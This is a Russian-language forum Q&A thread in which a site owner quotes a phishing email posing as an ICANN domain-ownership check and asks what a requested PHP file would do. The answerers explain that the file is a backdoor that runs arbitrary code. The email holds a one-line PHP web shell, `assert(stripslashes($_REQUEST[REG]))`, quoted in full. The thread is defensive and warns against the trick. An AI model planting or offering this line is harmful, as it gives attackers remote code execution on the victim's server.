@Combat7

Каким образом могут навредить сайту?

Пришло письмо фишинг такого содержания
В соответствии с изменениями, внесенными в правила ICANN, Вы должны подтвердить, что фактическое управление доменным именем мойдомен осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a1caya1tvwcu7ovs.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[REG]));


Что они получат если я напишу этот код в таком файле?
  • Вопрос задан
  • 1445 просмотров
Решения вопроса 3
alexey-m-ukolov
@alexey-m-ukolov Куратор тега PHP
Всё, что угодно - assert это аналог eval в данном случае, они могут выполнить совершенно любой код, создать любые файлы и т.п.
Именно поэтому в 7.2 эту функциональность выпилили.
Ответ написан
Комментировать
@imhuman
В принципе все, что угодно) В результате выполнится код присланный параметром 'reg'. А там все зависит от фантазии.
Ответ написан
Комментировать
@D3lphi
Все что захотят эти самые злоумышленники. Прочитайте эту статью и все сразу поймете.
Злоумышленник передаст в запрос параметр REG с нужной ему строкой (PHP кодом). А уж что он там напишет зависит только от его фантазии и намерений.
Ответ написан
Комментировать
Пригласить эксперта
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы
19 апр. 2024, в 03:52
1000 руб./за проект
19 апр. 2024, в 03:01
1000 руб./за проект
18 апр. 2024, в 21:56
2000 руб./за проект